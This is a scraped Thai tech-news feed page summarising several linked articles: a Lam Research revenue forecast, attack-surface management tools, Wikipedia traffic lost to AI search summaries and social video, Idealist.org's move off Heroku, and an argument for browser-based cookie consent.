https://www.thestar.com.my/tech/tech-news/2025/10/23/lam-research-expects-upbeat-quarterly-revenue-on-demand-for-chipmaking-tools
    WWW.THESTAR.COM.MY
    Lam Research expects upbeat quarterly revenue on demand for chipmaking tools
    (Reuters) -Lam Research forecast second-quarter revenue above Wall Street estimates on Wednesday, as chipmakers ordered more of its equipment used to manufacture semiconductors for artificial intelligence applications.
    0 Comments 0 Shares 131 Views 0 Reviews
  • “9 เครื่องมือจัดการ Attack Surface ที่องค์กรควรรู้ – ป้องกันภัยไซเบอร์ก่อนถูกเจาะ!”

    ในยุคที่ระบบ IT เชื่อมต่อกับโลกภายนอกตลอดเวลา การรู้ว่า “อะไรเปิดเผยอยู่บ้าง” คือกุญแจสำคัญในการป้องกันการโจมตี เครื่องมือประเภท CAASM (Cyber Asset Attack Surface Management) และ EASM (External Attack Surface Management) จึงกลายเป็นหัวใจของการรักษาความปลอดภัยระดับองค์กร

    บทความจาก CSO Online ได้รวบรวม 9 เครื่องมือเด่นที่ช่วยค้นหาและจัดการช่องโหว่ในระบบขององค์กร โดยแต่ละตัวมีจุดเด่นต่างกัน เช่น การมองจากมุมของแฮกเกอร์, การเชื่อมต่อกับระบบภายใน, หรือการวิเคราะห์ความเสี่ยงเชิงธุรกิจ

    เป้าหมายของเครื่องมือเหล่านี้คือการลด “ข้อมูลที่แฮกเกอร์มองเห็น” ให้เหลือน้อยที่สุด โดยยังคงให้บริการธุรกิจได้ตามปกติ และสามารถตรวจจับการเปลี่ยนแปลงแบบเรียลไทม์ เช่น การเพิ่ม asset ใหม่ หรือการเปลี่ยน config ที่อาจเกิดจาก human error หรือการโจมตี

    ความเข้าใจพื้นฐานของ Attack Surface
    หมายถึงทรัพยากรทั้งหมดที่เข้าถึงได้จากอินเทอร์เน็ต เช่น IP, domain, application
    รวมถึง open ports, SSL, server platform และ protocol ที่ใช้งาน
    ช่องโหว่เกิดจาก config ผิดพลาดหรือ software ที่ยังไม่ได้ patch
    แม้ asset จะอยู่ใน data center ก็ยังเสี่ยง หากไม่มีการ monitor ที่ดี

    ความสามารถของเครื่องมือ CAASM/EASM
    ตรวจจับ asset ใหม่และ config drift แบบเรียลไทม์
    วิเคราะห์ความเสี่ยงจากทั้งมุมเทคนิคและมุมธุรกิจ
    เชื่อมต่อกับระบบภายใน เช่น Jira, ServiceNow, Slack
    บางตัวสามารถทำ remediation อัตโนมัติหรือผ่าน playbook

    เครื่องมือเด่นที่แนะนำ
    Axonius – เน้น asset inventory และ policy compliance เช่น PCI/HIPAA
    CrowdStrike Falcon Surface – มองจากมุมแฮกเกอร์ พร้อม remediation ผ่าน integration
    CyCognito – วิเคราะห์ความสัมพันธ์ระหว่าง asset และจัดลำดับความเสี่ยง
    Informer – ค้นหา asset บน web/API พร้อม pen testing เสริม
    JupiterOne – แสดง asset แบบ visual map พร้อม query ขั้นสูง
    Microsoft Defender EASM – ค้นหา shadow IT และ probe ทุก layer ของ tech stack
    Rapid7 InsightVM – มีสิทธิ์ออก CVE ใหม่ พร้อม dashboard วิเคราะห์แบบเจาะลึก
    SOCRadar AttackMapper – ตรวจ SSL, DNS, defacement และ correlate กับวิธีโจมตี
    Tenable.asm – วิเคราะห์ asset ด้วย metadata กว่า 200 field พร้อม context เชิงธุรกิจ

    ข้อควรระวังและคำเตือน
    การ scan แบบ periodic ไม่เพียงพอ ต้องใช้ monitoring แบบต่อเนื่อง
    การไม่จัดการ config drift อาจเปิดช่องให้โจมตีโดยไม่รู้ตัว
    หากไม่เชื่อมโยง asset กับ context ธุรกิจ อาจจัดลำดับความเสี่ยงผิด
    การใช้หลายเครื่องมือโดยไม่มีการบูรณาการ อาจทำให้ข้อมูลกระจัดกระจาย
    การไม่ฝึกซ้อม incident response ทำให้ 57% ของเหตุการณ์จริงไม่เคยถูกจำลองมาก่อน

    https://www.csoonline.com/article/574797/9-attack-surface-discovery-and-management-tools.html
    🛡️ “9 เครื่องมือจัดการ Attack Surface ที่องค์กรควรรู้ – ป้องกันภัยไซเบอร์ก่อนถูกเจาะ!” ในยุคที่ระบบ IT เชื่อมต่อกับโลกภายนอกตลอดเวลา การรู้ว่า “อะไรเปิดเผยอยู่บ้าง” คือกุญแจสำคัญในการป้องกันการโจมตี เครื่องมือประเภท CAASM (Cyber Asset Attack Surface Management) และ EASM (External Attack Surface Management) จึงกลายเป็นหัวใจของการรักษาความปลอดภัยระดับองค์กร บทความจาก CSO Online ได้รวบรวม 9 เครื่องมือเด่นที่ช่วยค้นหาและจัดการช่องโหว่ในระบบขององค์กร โดยแต่ละตัวมีจุดเด่นต่างกัน เช่น การมองจากมุมของแฮกเกอร์, การเชื่อมต่อกับระบบภายใน, หรือการวิเคราะห์ความเสี่ยงเชิงธุรกิจ เป้าหมายของเครื่องมือเหล่านี้คือการลด “ข้อมูลที่แฮกเกอร์มองเห็น” ให้เหลือน้อยที่สุด โดยยังคงให้บริการธุรกิจได้ตามปกติ และสามารถตรวจจับการเปลี่ยนแปลงแบบเรียลไทม์ เช่น การเพิ่ม asset ใหม่ หรือการเปลี่ยน config ที่อาจเกิดจาก human error หรือการโจมตี ✅ ความเข้าใจพื้นฐานของ Attack Surface ➡️ หมายถึงทรัพยากรทั้งหมดที่เข้าถึงได้จากอินเทอร์เน็ต เช่น IP, domain, application ➡️ รวมถึง open ports, SSL, server platform และ protocol ที่ใช้งาน ➡️ ช่องโหว่เกิดจาก config ผิดพลาดหรือ software ที่ยังไม่ได้ patch ➡️ แม้ asset จะอยู่ใน data center ก็ยังเสี่ยง หากไม่มีการ monitor ที่ดี ✅ ความสามารถของเครื่องมือ CAASM/EASM ➡️ ตรวจจับ asset ใหม่และ config drift แบบเรียลไทม์ ➡️ วิเคราะห์ความเสี่ยงจากทั้งมุมเทคนิคและมุมธุรกิจ ➡️ เชื่อมต่อกับระบบภายใน เช่น Jira, ServiceNow, Slack ➡️ บางตัวสามารถทำ remediation อัตโนมัติหรือผ่าน playbook ✅ เครื่องมือเด่นที่แนะนำ ➡️ Axonius – เน้น asset inventory และ policy compliance เช่น PCI/HIPAA ➡️ CrowdStrike Falcon Surface – มองจากมุมแฮกเกอร์ พร้อม remediation ผ่าน integration ➡️ CyCognito – วิเคราะห์ความสัมพันธ์ระหว่าง asset และจัดลำดับความเสี่ยง ➡️ Informer – ค้นหา asset บน web/API พร้อม pen testing เสริม ➡️ JupiterOne – แสดง asset แบบ visual map พร้อม query ขั้นสูง ➡️ Microsoft Defender EASM – ค้นหา shadow IT และ probe ทุก layer ของ tech stack ➡️ Rapid7 InsightVM – มีสิทธิ์ออก CVE ใหม่ พร้อม dashboard วิเคราะห์แบบเจาะลึก ➡️ SOCRadar AttackMapper – ตรวจ SSL, DNS, defacement และ correlate กับวิธีโจมตี ➡️ Tenable.asm – วิเคราะห์ asset ด้วย metadata กว่า 200 field พร้อม context เชิงธุรกิจ ‼️ ข้อควรระวังและคำเตือน ⛔ การ scan แบบ periodic ไม่เพียงพอ ต้องใช้ monitoring แบบต่อเนื่อง ⛔ การไม่จัดการ config drift อาจเปิดช่องให้โจมตีโดยไม่รู้ตัว ⛔ หากไม่เชื่อมโยง asset กับ context ธุรกิจ อาจจัดลำดับความเสี่ยงผิด ⛔ การใช้หลายเครื่องมือโดยไม่มีการบูรณาการ อาจทำให้ข้อมูลกระจัดกระจาย ⛔ การไม่ฝึกซ้อม incident response ทำให้ 57% ของเหตุการณ์จริงไม่เคยถูกจำลองมาก่อน https://www.csoonline.com/article/574797/9-attack-surface-discovery-and-management-tools.html
    WWW.CSOONLINE.COM
    CAASM and EASM: Top 12 attack surface discovery and management tools
    The main goal of cyber asset attack surface management (CAASM) and external attack surface management (EASM) tools is to protect information about a company’s security measures from attackers. Here are 9 tools to consider when deciding what is best for the business.
    0 Comments 0 Shares 149 Views 0 Reviews
  • “Wikipedia เผยทราฟฟิกลดฮวบ – คนหันไปดูคลิปกับใช้ AI ตอบแทนการคลิก”

    Wikipedia ซึ่งเคยเป็นแหล่งข้อมูลอันดับหนึ่งของโลก กำลังเผชิญกับการเปลี่ยนแปลงครั้งใหญ่ในพฤติกรรมผู้ใช้ โดย Marshall Miller จาก Wikimedia Foundation เผยว่า จำนวนผู้เข้าชมลดลง 8% เมื่อเทียบกับปีก่อน และมีแนวโน้มลดลงต่อเนื่อง

    สาเหตุหลักคือการเปลี่ยนวิธี “ค้นหาความรู้” ของผู้คน โดยเฉพาะจากสองกระแสใหญ่:

    1️⃣ AI search summaries – เครื่องมือค้นหาหลายเจ้าตอนนี้ใช้ AI สรุปคำตอบให้ทันทีโดยไม่ต้องคลิกเข้าเว็บ เช่น Google’s SGE หรือ Bing Copilot ทำให้ผู้ใช้ได้คำตอบจาก Wikipedia โดยไม่เคยเข้า Wikipedia จริง ๆ

    2️⃣ Social video platforms – คนรุ่นใหม่หันไปใช้ TikTok, YouTube Shorts และ Instagram Reels เพื่อหาความรู้แบบเร็ว ๆ แทนการอ่านบทความยาว ๆ บนเว็บ

    Wikipedia เองเคยทดลองใช้ AI สรุปบทความ แต่ต้องหยุดไปเพราะชุมชนผู้แก้ไขไม่พอใจเรื่องความแม่นยำและการควบคุมเนื้อหา

    สิ่งที่น่ากังวลคือ หากคนไม่เข้า Wikipedia โดยตรง ก็จะมีผู้แก้ไขน้อยลง และยอดบริจาคก็ลดลงตามไปด้วย ซึ่งอาจกระทบต่อคุณภาพและความยั่งยืนของเนื้อหาในระยะยาว

    Miller จึงเรียกร้องให้บริษัท AI และแพลตฟอร์มค้นหา “ส่งคนกลับเข้า Wikipedia” และกำลังพัฒนา framework ใหม่เพื่อให้การอ้างอิงเนื้อหาจาก Wikipedia มีความชัดเจนและเป็นธรรมมากขึ้น

    สถานการณ์ปัจจุบันของ Wikipedia
    จำนวนผู้เข้าชมลดลง 8% เมื่อเทียบกับปีก่อน
    การลดลงเกิดหลังจากปรับระบบตรวจจับ bot ใหม่
    พบว่าทราฟฟิกสูงช่วงพฤษภาคม–มิถุนายนมาจาก bot ที่หลบการตรวจจับ

    สาเหตุของการลดลง
    AI search summaries ให้คำตอบโดยไม่ต้องคลิกเข้าเว็บ
    คนรุ่นใหม่หันไปใช้ social video เพื่อหาความรู้
    พฤติกรรมการค้นหาข้อมูลเปลี่ยนจาก “อ่าน” เป็น “ดู” และ “ฟัง”

    ผลกระทบต่อ Wikipedia
    ผู้เข้าชมน้อยลง = ผู้แก้ไขน้อยลง
    ยอดบริจาคลดลงตามจำนวนผู้ใช้
    เสี่ยงต่อคุณภาพและความยั่งยืนของเนื้อหา
    ความเข้าใจของผู้ใช้ต่อแหล่งที่มาของข้อมูลลดลง

    การตอบสนองจาก Wikimedia Foundation
    เรียกร้องให้ AI และ search engine ส่งคนกลับเข้า Wikipedia
    พัฒนา framework ใหม่สำหรับการอ้างอิงเนื้อหา
    มีทีมงาน 2 ทีมช่วยผลักดัน Wikipedia สู่กลุ่มผู้ใช้ใหม่
    หยุดการใช้ AI สรุปบทความหลังชุมชนไม่พอใจ

    ข้อควรระวังและคำเตือน
    หากคนไม่เข้า Wikipedia โดยตรง อาจไม่รู้ว่าเนื้อหามาจากไหน
    การลดจำนวนผู้แก้ไขอาจทำให้เนื้อหาล้าสมัยหรือผิดพลาด
    การพึ่งพา AI summaries อาจลดความหลากหลายของมุมมอง
    หากยอดบริจาคลดลง อาจกระทบต่อการดำเนินงานของ Wikimedia
    การใช้ social video เพื่อหาความรู้อาจทำให้ข้อมูลผิดพลาดแพร่กระจายง่ายขึ้น

    https://techcrunch.com/2025/10/18/wikipedia-says-traffic-is-falling-due-to-ai-search-summaries-and-social-video/
    📉 “Wikipedia เผยทราฟฟิกลดฮวบ – คนหันไปดูคลิปกับใช้ AI ตอบแทนการคลิก” Wikipedia ซึ่งเคยเป็นแหล่งข้อมูลอันดับหนึ่งของโลก กำลังเผชิญกับการเปลี่ยนแปลงครั้งใหญ่ในพฤติกรรมผู้ใช้ โดย Marshall Miller จาก Wikimedia Foundation เผยว่า จำนวนผู้เข้าชมลดลง 8% เมื่อเทียบกับปีก่อน และมีแนวโน้มลดลงต่อเนื่อง สาเหตุหลักคือการเปลี่ยนวิธี “ค้นหาความรู้” ของผู้คน โดยเฉพาะจากสองกระแสใหญ่: 1️⃣ AI search summaries – เครื่องมือค้นหาหลายเจ้าตอนนี้ใช้ AI สรุปคำตอบให้ทันทีโดยไม่ต้องคลิกเข้าเว็บ เช่น Google’s SGE หรือ Bing Copilot ทำให้ผู้ใช้ได้คำตอบจาก Wikipedia โดยไม่เคยเข้า Wikipedia จริง ๆ 2️⃣ Social video platforms – คนรุ่นใหม่หันไปใช้ TikTok, YouTube Shorts และ Instagram Reels เพื่อหาความรู้แบบเร็ว ๆ แทนการอ่านบทความยาว ๆ บนเว็บ Wikipedia เองเคยทดลองใช้ AI สรุปบทความ แต่ต้องหยุดไปเพราะชุมชนผู้แก้ไขไม่พอใจเรื่องความแม่นยำและการควบคุมเนื้อหา สิ่งที่น่ากังวลคือ หากคนไม่เข้า Wikipedia โดยตรง ก็จะมีผู้แก้ไขน้อยลง และยอดบริจาคก็ลดลงตามไปด้วย ซึ่งอาจกระทบต่อคุณภาพและความยั่งยืนของเนื้อหาในระยะยาว Miller จึงเรียกร้องให้บริษัท AI และแพลตฟอร์มค้นหา “ส่งคนกลับเข้า Wikipedia” และกำลังพัฒนา framework ใหม่เพื่อให้การอ้างอิงเนื้อหาจาก Wikipedia มีความชัดเจนและเป็นธรรมมากขึ้น ✅ สถานการณ์ปัจจุบันของ Wikipedia ➡️ จำนวนผู้เข้าชมลดลง 8% เมื่อเทียบกับปีก่อน ➡️ การลดลงเกิดหลังจากปรับระบบตรวจจับ bot ใหม่ ➡️ พบว่าทราฟฟิกสูงช่วงพฤษภาคม–มิถุนายนมาจาก bot ที่หลบการตรวจจับ ✅ สาเหตุของการลดลง ➡️ AI search summaries ให้คำตอบโดยไม่ต้องคลิกเข้าเว็บ ➡️ คนรุ่นใหม่หันไปใช้ social video เพื่อหาความรู้ ➡️ พฤติกรรมการค้นหาข้อมูลเปลี่ยนจาก “อ่าน” เป็น “ดู” และ “ฟัง” ✅ ผลกระทบต่อ Wikipedia ➡️ ผู้เข้าชมน้อยลง = ผู้แก้ไขน้อยลง ➡️ ยอดบริจาคลดลงตามจำนวนผู้ใช้ ➡️ เสี่ยงต่อคุณภาพและความยั่งยืนของเนื้อหา ➡️ ความเข้าใจของผู้ใช้ต่อแหล่งที่มาของข้อมูลลดลง ✅ การตอบสนองจาก Wikimedia Foundation ➡️ เรียกร้องให้ AI และ search engine ส่งคนกลับเข้า Wikipedia ➡️ พัฒนา framework ใหม่สำหรับการอ้างอิงเนื้อหา ➡️ มีทีมงาน 2 ทีมช่วยผลักดัน Wikipedia สู่กลุ่มผู้ใช้ใหม่ ➡️ หยุดการใช้ AI สรุปบทความหลังชุมชนไม่พอใจ ‼️ ข้อควรระวังและคำเตือน ⛔ หากคนไม่เข้า Wikipedia โดยตรง อาจไม่รู้ว่าเนื้อหามาจากไหน ⛔ การลดจำนวนผู้แก้ไขอาจทำให้เนื้อหาล้าสมัยหรือผิดพลาด ⛔ การพึ่งพา AI summaries อาจลดความหลากหลายของมุมมอง ⛔ หากยอดบริจาคลดลง อาจกระทบต่อการดำเนินงานของ Wikimedia ⛔ การใช้ social video เพื่อหาความรู้อาจทำให้ข้อมูลผิดพลาดแพร่กระจายง่ายขึ้น https://techcrunch.com/2025/10/18/wikipedia-says-traffic-is-falling-due-to-ai-search-summaries-and-social-video/
    TECHCRUNCH.COM
    Wikipedia says traffic is falling due to AI search summaries and social video | TechCrunch
    Looks like Wikipedia isn't immune to broader online trends, with human page views falling 8% year-over-year, according to a new blog post from Marshall Miller of the Wikimedia Foundation.
    0 Comments 0 Shares 136 Views 0 Reviews
  • “Idealist.org ลดค่าใช้จ่ายจาก $3,000 เหลือ $55 ต่อเดือน – เปลี่ยนจาก Heroku มาใช้เซิร์ฟเวอร์เดียวกับ Disco!”

    Idealist.org ซึ่งเป็นเว็บไซต์หางานด้าน nonprofit ที่มีผู้ใช้งานหลายล้านคนต่อเดือน เคยใช้ Heroku สำหรับ staging environment โดยเสียค่าใช้จ่ายถึง $500 ต่อ environment และมีทั้งหมด 6 environment รวมแล้วจ่ายถึง $3,000 ต่อเดือน แค่เพื่อการทดสอบก่อนปล่อยจริง!

    ทีมงานจึงทดลองย้าย staging environment ไปยังเซิร์ฟเวอร์เดียวบน Hetzner ราคาเพียง $55 ต่อเดือน โดยใช้เครื่องมือชื่อว่า Disco ซึ่งช่วยให้ยังคง workflow แบบ “git push to deploy” ได้เหมือนเดิม

    Disco ไม่ใช่แค่ docker-compose ธรรมดา แต่ให้ฟีเจอร์แบบ PaaS เช่น deploy อัตโนมัติ, SSL certificate, UI สำหรับดู log และจัดการ environment ได้ง่าย ๆ ทำให้ทีมสามารถสร้าง staging ใหม่ได้ทันทีโดยไม่ต้องขออนุญาตหรือกังวลเรื่องค่าใช้จ่าย

    ผลลัพธ์คือจากเดิมที่มีแค่ 2 environment (dev และ main) ตอนนี้มีถึง 6 environment บนเซิร์ฟเวอร์เดียว โดยใช้ CPU แค่ ~2% และ RAM 14 GB จาก 32 GB เท่านั้น

    แม้จะต้องจัดการ DNS, CDN และดูแลเซิร์ฟเวอร์เอง แต่ทีมยอมรับได้ เพราะประหยัดงบมหาศาล และได้ความคล่องตัวในการพัฒนาเพิ่มขึ้น

    ปัญหาที่พบจากการใช้ Heroku
    ค่าใช้จ่ายสูงถึง $500 ต่อ staging environment
    ต้องจำกัดจำนวน environment เพราะงบประมาณ
    ระบบ staging กลายเป็นทรัพยากรที่หายากและต้องขออนุญาตก่อนใช้

    แนวทางใหม่ที่ใช้ Disco บนเซิร์ฟเวอร์เดียว
    ใช้ Hetzner CCX33 ราคา $55/เดือน
    ใช้ Disco เพื่อรักษา workflow แบบ git push to deploy
    แชร์ Postgres instance เดียวกันสำหรับ staging ทั้งหมด
    สร้าง environment ใหม่ได้ง่ายและรวดเร็ว
    ใช้ CPU ~2% และ RAM 14 GB จาก 32 GB

    ฟีเจอร์ของ Disco ที่ช่วยให้ใช้งานง่าย
    deploy อัตโนมัติแบบ zero-downtime
    SSL certificate อัตโนมัติสำหรับทุก branch
    UI สำหรับดู log และจัดการ environment
    ไม่ต้องเขียน automation เองเหมือนใช้ VPS แบบดิบ ๆ

    ผลลัพธ์ที่ได้
    ลดค่าใช้จ่ายจาก $3,000 เหลือ $55 ต่อเดือน
    สร้าง staging ได้ทันทีโดยไม่ต้องขออนุญาต
    เพิ่มความคล่องตัวในการพัฒนาและทดสอบ
    เปลี่ยน mindset จาก “staging เป็นของแพง” เป็น “staging เป็นของฟรี”

    ข้อควรระวังและคำเตือน
    ต้องจัดการ DNS และ CDN ด้วยตัวเอง
    ต้องดูแลเรื่อง security และ monitoring ของเซิร์ฟเวอร์
    หากเซิร์ฟเวอร์ล่ม ต้อง reprovision ใหม่เอง
    ต้องปรับ networking ของแอปให้เข้ากับ Docker
    Disco ยังไม่เหมาะกับ workload ที่ต้อง redundancy สูง

    https://disco.cloud/blog/how-idealistorg-replaced-a-3000mo-heroku-bill-with-a-55mo-server/
    💸 “Idealist.org ลดค่าใช้จ่ายจาก $3,000 เหลือ $55 ต่อเดือน – เปลี่ยนจาก Heroku มาใช้เซิร์ฟเวอร์เดียวกับ Disco!” Idealist.org ซึ่งเป็นเว็บไซต์หางานด้าน nonprofit ที่มีผู้ใช้งานหลายล้านคนต่อเดือน เคยใช้ Heroku สำหรับ staging environment โดยเสียค่าใช้จ่ายถึง $500 ต่อ environment และมีทั้งหมด 6 environment รวมแล้วจ่ายถึง $3,000 ต่อเดือน แค่เพื่อการทดสอบก่อนปล่อยจริง! ทีมงานจึงทดลองย้าย staging environment ไปยังเซิร์ฟเวอร์เดียวบน Hetzner ราคาเพียง $55 ต่อเดือน โดยใช้เครื่องมือชื่อว่า Disco ซึ่งช่วยให้ยังคง workflow แบบ “git push to deploy” ได้เหมือนเดิม Disco ไม่ใช่แค่ docker-compose ธรรมดา แต่ให้ฟีเจอร์แบบ PaaS เช่น deploy อัตโนมัติ, SSL certificate, UI สำหรับดู log และจัดการ environment ได้ง่าย ๆ ทำให้ทีมสามารถสร้าง staging ใหม่ได้ทันทีโดยไม่ต้องขออนุญาตหรือกังวลเรื่องค่าใช้จ่าย ผลลัพธ์คือจากเดิมที่มีแค่ 2 environment (dev และ main) ตอนนี้มีถึง 6 environment บนเซิร์ฟเวอร์เดียว โดยใช้ CPU แค่ ~2% และ RAM 14 GB จาก 32 GB เท่านั้น แม้จะต้องจัดการ DNS, CDN และดูแลเซิร์ฟเวอร์เอง แต่ทีมยอมรับได้ เพราะประหยัดงบมหาศาล และได้ความคล่องตัวในการพัฒนาเพิ่มขึ้น ✅ ปัญหาที่พบจากการใช้ Heroku ➡️ ค่าใช้จ่ายสูงถึง $500 ต่อ staging environment ➡️ ต้องจำกัดจำนวน environment เพราะงบประมาณ ➡️ ระบบ staging กลายเป็นทรัพยากรที่หายากและต้องขออนุญาตก่อนใช้ ✅ แนวทางใหม่ที่ใช้ Disco บนเซิร์ฟเวอร์เดียว ➡️ ใช้ Hetzner CCX33 ราคา $55/เดือน ➡️ ใช้ Disco เพื่อรักษา workflow แบบ git push to deploy ➡️ แชร์ Postgres instance เดียวกันสำหรับ staging ทั้งหมด ➡️ สร้าง environment ใหม่ได้ง่ายและรวดเร็ว ➡️ ใช้ CPU ~2% และ RAM 14 GB จาก 32 GB ✅ ฟีเจอร์ของ Disco ที่ช่วยให้ใช้งานง่าย ➡️ deploy อัตโนมัติแบบ zero-downtime ➡️ SSL certificate อัตโนมัติสำหรับทุก branch ➡️ UI สำหรับดู log และจัดการ environment ➡️ ไม่ต้องเขียน automation เองเหมือนใช้ VPS แบบดิบ ๆ ✅ ผลลัพธ์ที่ได้ ➡️ ลดค่าใช้จ่ายจาก $3,000 เหลือ $55 ต่อเดือน ➡️ สร้าง staging ได้ทันทีโดยไม่ต้องขออนุญาต ➡️ เพิ่มความคล่องตัวในการพัฒนาและทดสอบ ➡️ เปลี่ยน mindset จาก “staging เป็นของแพง” เป็น “staging เป็นของฟรี” ‼️ ข้อควรระวังและคำเตือน ⛔ ต้องจัดการ DNS และ CDN ด้วยตัวเอง ⛔ ต้องดูแลเรื่อง security และ monitoring ของเซิร์ฟเวอร์ ⛔ หากเซิร์ฟเวอร์ล่ม ต้อง reprovision ใหม่เอง ⛔ ต้องปรับ networking ของแอปให้เข้ากับ Docker ⛔ Disco ยังไม่เหมาะกับ workload ที่ต้อง redundancy สูง https://disco.cloud/blog/how-idealistorg-replaced-a-3000mo-heroku-bill-with-a-55mo-server/
    DISCO.CLOUD
    How Idealist.org Replaced a $3,000/mo Heroku Bill with a $55/mo Server
    At Disco, we help teams escape expensive PaaS pricing while keeping the developer experience they love. This is the story of how Idealist.org, the world's largest nonprofit job board, tackled a common and expensive challenge: the rising cost of staging environments on Heroku. To give a sense of scale …
    0 Comments 0 Shares 119 Views 0 Reviews
  • “ถึงเวลาย้ายภาระ! กฎหมายคุกกี้ควรควบคุมเบราว์เซอร์ ไม่ใช่โยนภาระให้เว็บไซต์อีกต่อไป”

    ทุกวันนี้เวลาเราเข้าเว็บไซต์ใหม่ ๆ สิ่งแรกที่เจอไม่ใช่เนื้อหาที่เราต้องการอ่าน แต่คือ “แบนเนอร์คุกกี้” ที่เด้งขึ้นมาทุกครั้ง พร้อมปุ่ม “Accept All” หรือ “Manage Preferences” ที่ซับซ้อนและน่ารำคาญสุด ๆ

    บทความนี้ชี้ให้เห็นว่า ปัญหานี้ไม่ได้เกิดจาก “อะไร” แต่เกิดจาก “ใคร” คือกฎหมายคุ้มครองข้อมูลส่วนบุคคล เช่น GDPR และ CCPA ที่มีเจตนาดี ต้องการให้ผู้ใช้ควบคุมข้อมูลของตัวเองได้ แต่กลับวางภาระไว้ที่ “เว็บไซต์” แทนที่จะเป็น “เบราว์เซอร์” ซึ่งเป็นเครื่องมือกลางที่ทุกคนใช้เข้าถึงเว็บ

    ลองนึกภาพว่า ถ้าเราต้องอนุญาตให้รถยนต์ใช้ล้อหรือน้ำมันทุกครั้งก่อนขับ มันจะน่ารำคาญแค่ไหน? นั่นแหละคือสิ่งที่เราทำอยู่บนอินเทอร์เน็ตทุกวัน

    แนวคิดที่เสนอคือ ให้เบราว์เซอร์เป็นตัวกลางในการตั้งค่าความเป็นส่วนตัวของผู้ใช้ เช่น เลือกได้ตั้งแต่ “เฉพาะข้อมูลจำเป็น”, “วิเคราะห์การใช้งาน”, หรือ “โฆษณาแบบเฉพาะบุคคล” แล้วเบราว์เซอร์จะเป็นคนจัดการให้ทุกเว็บไซต์ทำตามโดยอัตโนมัติ

    ข้อดีคือ ผู้ใช้จะได้ประสบการณ์ที่สะอาดขึ้น ไม่ต้องคลิกแบนเนอร์ซ้ำ ๆ ส่วนเว็บไซต์ก็ไม่ต้องเสียเงินจ้างทีมกฎหมายหรือใช้ปลั๊กอินราคาแพงเพื่อให้ comply กับกฎหมาย และที่สำคัญคือ หน่วยงานกำกับดูแลสามารถตรวจสอบเบราว์เซอร์ไม่กี่ตัวได้ง่ายกว่าการไล่ตรวจเว็บไซต์นับล้าน

    แนวคิดนี้ไม่ใช่เรื่องใหม่ เพราะเคยมีความพยายามทำ “Do Not Track” มาก่อน แต่ล้มเหลวเพราะเว็บไซต์ไม่ยอมทำตาม แต่ถ้ากฎหมายบังคับให้เบราว์เซอร์ต้องเคารพการตั้งค่าของผู้ใช้จริง ๆ ก็จะเปลี่ยนเกมได้เลย

    ปัญหาของระบบคุกกี้ปัจจุบัน
    ผู้ใช้ต้องคลิกแบนเนอร์คุกกี้ซ้ำ ๆ ทุกเว็บไซต์
    เว็บไซต์ต้องลงทุนในระบบจัดการคุกกี้ที่ซับซ้อน
    การยินยอมกลายเป็นแค่ “พิธีกรรม” ไม่ใช่การตัดสินใจอย่างมีข้อมูล
    ผู้ใช้มักคลิก “Accept All” เพื่อให้เข้าเว็บได้เร็ว ๆ

    แนวคิดใหม่: ย้ายการควบคุมไปที่เบราว์เซอร์
    ผู้ใช้ตั้งค่าความเป็นส่วนตัวครั้งเดียวในเบราว์เซอร์
    เบราว์เซอร์จะบังคับใช้การตั้งค่านั้นกับทุกเว็บไซต์
    ลดภาระให้เว็บไซต์ ไม่ต้องสร้างแบนเนอร์หรือระบบจัดการคุกกี้
    หน่วยงานกำกับดูแลสามารถตรวจสอบเบราว์เซอร์ได้ง่ายกว่าเว็บไซต์

    ตัวอย่างการตั้งค่าความเป็นส่วนตัวในเบราว์เซอร์
    “เฉพาะข้อมูลจำเป็น” – ใช้เฉพาะคุกกี้ที่จำเป็นต่อการทำงานของเว็บไซต์
    “วิเคราะห์การใช้งาน” – อนุญาตให้เก็บข้อมูลแบบไม่ระบุตัวตน
    “โฆษณาแบบเฉพาะบุคคล” – อนุญาตให้ใช้ข้อมูลเพื่อแสดงโฆษณาที่ตรงกับความสนใจ
    “กำหนดเอง” – ผู้ใช้เลือกได้ละเอียดตามประเภทข้อมูล

    ประโยชน์ของระบบใหม่
    ผู้ใช้ได้ประสบการณ์ที่ดีขึ้น ไม่ต้องเจอแบนเนอร์
    เว็บไซต์ลดต้นทุนและความซับซ้อนในการ comply
    ระบบมีความโปร่งใสและตรวจสอบได้ง่ายขึ้น
    ลดความเหลื่อมล้ำระหว่างเว็บไซต์ใหญ่กับเว็บไซต์เล็ก

    https://nednex.com/en/the-internets-biggest-annoyance-why-cookie-laws-should-target-browsers-not-websites/
    🧩 “ถึงเวลาย้ายภาระ! กฎหมายคุกกี้ควรควบคุมเบราว์เซอร์ ไม่ใช่โยนภาระให้เว็บไซต์อีกต่อไป” ทุกวันนี้เวลาเราเข้าเว็บไซต์ใหม่ ๆ สิ่งแรกที่เจอไม่ใช่เนื้อหาที่เราต้องการอ่าน แต่คือ “แบนเนอร์คุกกี้” ที่เด้งขึ้นมาทุกครั้ง พร้อมปุ่ม “Accept All” หรือ “Manage Preferences” ที่ซับซ้อนและน่ารำคาญสุด ๆ บทความนี้ชี้ให้เห็นว่า ปัญหานี้ไม่ได้เกิดจาก “อะไร” แต่เกิดจาก “ใคร” คือกฎหมายคุ้มครองข้อมูลส่วนบุคคล เช่น GDPR และ CCPA ที่มีเจตนาดี ต้องการให้ผู้ใช้ควบคุมข้อมูลของตัวเองได้ แต่กลับวางภาระไว้ที่ “เว็บไซต์” แทนที่จะเป็น “เบราว์เซอร์” ซึ่งเป็นเครื่องมือกลางที่ทุกคนใช้เข้าถึงเว็บ ลองนึกภาพว่า ถ้าเราต้องอนุญาตให้รถยนต์ใช้ล้อหรือน้ำมันทุกครั้งก่อนขับ มันจะน่ารำคาญแค่ไหน? นั่นแหละคือสิ่งที่เราทำอยู่บนอินเทอร์เน็ตทุกวัน แนวคิดที่เสนอคือ ให้เบราว์เซอร์เป็นตัวกลางในการตั้งค่าความเป็นส่วนตัวของผู้ใช้ เช่น เลือกได้ตั้งแต่ “เฉพาะข้อมูลจำเป็น”, “วิเคราะห์การใช้งาน”, หรือ “โฆษณาแบบเฉพาะบุคคล” แล้วเบราว์เซอร์จะเป็นคนจัดการให้ทุกเว็บไซต์ทำตามโดยอัตโนมัติ ข้อดีคือ ผู้ใช้จะได้ประสบการณ์ที่สะอาดขึ้น ไม่ต้องคลิกแบนเนอร์ซ้ำ ๆ ส่วนเว็บไซต์ก็ไม่ต้องเสียเงินจ้างทีมกฎหมายหรือใช้ปลั๊กอินราคาแพงเพื่อให้ comply กับกฎหมาย และที่สำคัญคือ หน่วยงานกำกับดูแลสามารถตรวจสอบเบราว์เซอร์ไม่กี่ตัวได้ง่ายกว่าการไล่ตรวจเว็บไซต์นับล้าน 